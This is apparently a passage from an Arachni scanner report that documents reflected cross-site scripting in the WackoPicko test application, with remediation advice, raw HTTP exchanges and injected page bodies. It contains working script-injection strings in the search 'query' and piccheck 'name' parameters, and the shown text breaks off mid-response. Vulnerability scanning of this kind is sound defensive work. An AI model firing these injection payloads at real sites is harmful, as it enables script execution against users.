Filtering of untrusted data typically involves converting special characters to their HTML entity encoded counterparts (however, other methods do exist, see references). These special characters include:
&<>"'/An example of HTML entity encoding is converting < to <.
Although it is possible to filter untrusted input, there are five locations within an HTML page where untrusted input (even if it has been filtered) should never be placed:
Each of these locations have their own form of escaping and filtering.
Because many browsers attempt to implement XSS protection, any manual verification of this finding should be conducted using multiple different browsers and browser versions.
form
input
query
using
GET
at
http://192.168.0.26/WackoPicko/
pointing to
http://192.168.0.26/WackoPicko/pictures/search.php
.
0 1 2 3 4 5 | <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;"> <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""> </input> <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;"> </input> </form> |
| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
form |
http://192.168.0.26/WackoPicko/ | http://192.168.0.26/WackoPicko/pictures/search.php |
|
|
http://192.168.0.26/WackoPicko/pictures/search.php?query=%3C/script%3E%3Cscript%3Ewindow.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()%3C/script%3E
Transitions describe the steps required to restore the state of the page, to the one it had when it was processed by the scanner, as a series of events. In essence, each transition represents a user interaction.
Execution-flow sinks log the successful execution of an injected Javascript payload within the page's Javascript environment. Each sink is a point of payload execution.
| # | Data | |
|---|---|---|
| 0 |
No helper data logged. |
Inspect |
Raw HTTP request used to retrieve the page.
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:52 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 976
Content-Type: text/html
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._%s_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;
/* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value="</script><script>window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script>"/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Pictures that are tagged as '</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
'</h2>
<div class="column prepend-1 span-21 first last" style="margin-bottom: 2em;">
<h3 class="error">No pictures here...</h3>
</ul>
</div>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
This is the browser-evaluated body, as a result of the listed transitions.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 | <html><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._%s_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection"> <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]--> <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen"> <title>WackoPicko.com</title> </head> <body> <div class="container " style="border: 2px solid #5c95cf;"> <div class="column span-24 first last"> <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1> </div> <div id="menu"> <div class="column prepend-1 span-14 first"> <ul class="menu"> <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li> <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li> <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li> <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li> </ul> </div> <div class="column prepend-1 span-7 first last"> <ul class="menu top_login"> <li><a href="/WackoPicko/users/login.php"><span>Login</span></a></li> </ul> </div> </div> <div class="column span-24 first last" id="search_bar_blue"> <div class="column prepend-17 span-7 first last" id="search_box"> <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;"> <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value="</script><script>window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script>"> <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;"> </form> </div> </div> <div class="column prepend-1 span-24 first last"> <h2>Pictures that are tagged as ' <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> '</h2> <div class="column prepend-1 span-21 first last" style="margin-bottom: 2em;"> <h3 class="error">No pictures here...</h3> </div> </div> <div class="column span-24 first last" id="footer"> <ul> <li><a href="/WackoPicko/">Home</a> |</li> <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li> <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li> <li><a href="/WackoPicko/tos.php">Terms of Service</a></li> </ul> </div> </div> </body></html> |
This is the original HTTP response body.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 | <script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._%s_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <html> <head> <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection"> <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]--> <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen"> <title>WackoPicko.com</title> </head> <body> <div class="container " style="border: 2px solid #5c95cf;"> <div class="column span-24 first last"> <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1> </div> <div id="menu"> <div class="column prepend-1 span-14 first"> <ul class="menu"> <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li> <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li> <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li> <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li> </ul> </div> <div class="column prepend-1 span-7 first last"> <ul class="menu top_login" > <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li> </ul> </div> </div> <div class="column span-24 first last" id="search_bar_blue"> <div class="column prepend-17 span-7 first last" id="search_box"> <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;"> <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value="</script><script>window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script>"/> <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" /> </form> </div> </div> <div class="column prepend-1 span-24 first last"> <h2>Pictures that are tagged as '</script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> '</h2> <div class="column prepend-1 span-21 first last" style="margin-bottom: 2em;"> <h3 class="error">No pictures here...</h3> </ul> </div> </div> <div class="column span-24 first last" id="footer" > <ul> <li><a href="/WackoPicko/">Home</a> |</li> <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li> <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li> <li><a href="/WackoPicko/tos.php">Terms of Service</a></li> </ul> </div> </div> </body> </html> |
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
form
input
name
using
GET
at
http://192.168.0.26/WackoPicko/
pointing to
http://192.168.0.26/WackoPicko/piccheck.php
.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 | <form enctype="multipart/form-data" action="/WackoPicko/piccheck.php" method="POST"> <input type="hidden" name="MAX_FILE_SIZE" value="30000"> </input> Check this file: <input name="userfile" type="file"> </input> <br> </br> With this name: <input name="name" type="text"> </input> <br> </br> <br> </br> <input type="submit" value="Send File"> </input> <br> </br> </form> |
| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
form |
http://192.168.0.26/WackoPicko/ | http://192.168.0.26/WackoPicko/piccheck.php |
|
|
Transitions describe the steps required to restore the state of the page, to the one it had when it was processed by the scanner, as a series of events. In essence, each transition represents a user interaction.
| # | Time | Event | Element | Options | ||
|---|---|---|---|---|---|---|
| 0 | 0.643234 | load |
page
|
|
||
| 1 | 0.100679 | request |
http://192.168.0.26/WackoPicko/piccheck.php |
|
||
| 2 | 0.108976 | request |
http://192.168.0.26/WackoPicko/css/stylings.php |
|
Execution-flow sinks log the successful execution of an injected Javascript payload within the page's Javascript environment. Each sink is a point of payload execution.
| # | Data | |
|---|---|---|
| 0 |
No helper data logged. |
Inspect |
Raw HTTP request used to retrieve the page.
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:50:03 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 930
Content-Type: text/html
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._%s_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;
/* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Checking your file </script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</h2>
<p>
File is O.K. to upload!
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
This is the browser-evaluated body, as a result of the listed transitions.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 | <html><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._%s_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection"> <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]--> <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen"> <title>WackoPicko.com</title> </head> <body> <div class="container " style="border: 2px solid #5c95cf;"> <div class="column span-24 first last"> <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1> </div> <div id="menu"> <div class="column prepend-1 span-14 first"> <ul class="menu"> <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li> <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li> <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li> <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li> </ul> </div> <div class="column prepend-1 span-7 first last"> <ul class="menu top_login"> <li><a href="/WackoPicko/users/login.php"><span>Login</span></a></li> </ul> </div> </div> <div class="column span-24 first last" id="search_bar_blue"> <div class="column prepend-17 span-7 first last" id="search_box"> <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;"> <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""> <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;"> </form> </div> </div> <div class="column prepend-1 span-24 first last"> <h2>Checking your file <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </h2> <p> File is O.K. to upload! </p> </div> <div class="column span-24 first last" id="footer"> <ul> <li><a href="/WackoPicko/">Home</a> |</li> <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li> <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li> <li><a href="/WackoPicko/tos.php">Terms of Service</a></li> </ul> </div> </div> </body></html> |
This is the original HTTP response body.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 | <script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._%s_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <html> <head> <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection"> <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]--> <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen"> <title>WackoPicko.com</title> </head> <body> <div class="container " style="border: 2px solid #5c95cf;"> <div class="column span-24 first last"> <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1> </div> <div id="menu"> <div class="column prepend-1 span-14 first"> <ul class="menu"> <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li> <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li> <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li> <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li> </ul> </div> <div class="column prepend-1 span-7 first last"> <ul class="menu top_login" > <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li> </ul> </div> </div> <div class="column span-24 first last" id="search_bar_blue"> <div class="column prepend-17 span-7 first last" id="search_box"> <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;"> <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/> <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" /> </form> </div> </div> <div class="column prepend-1 span-24 first last"> <h2>Checking your file </script> <script 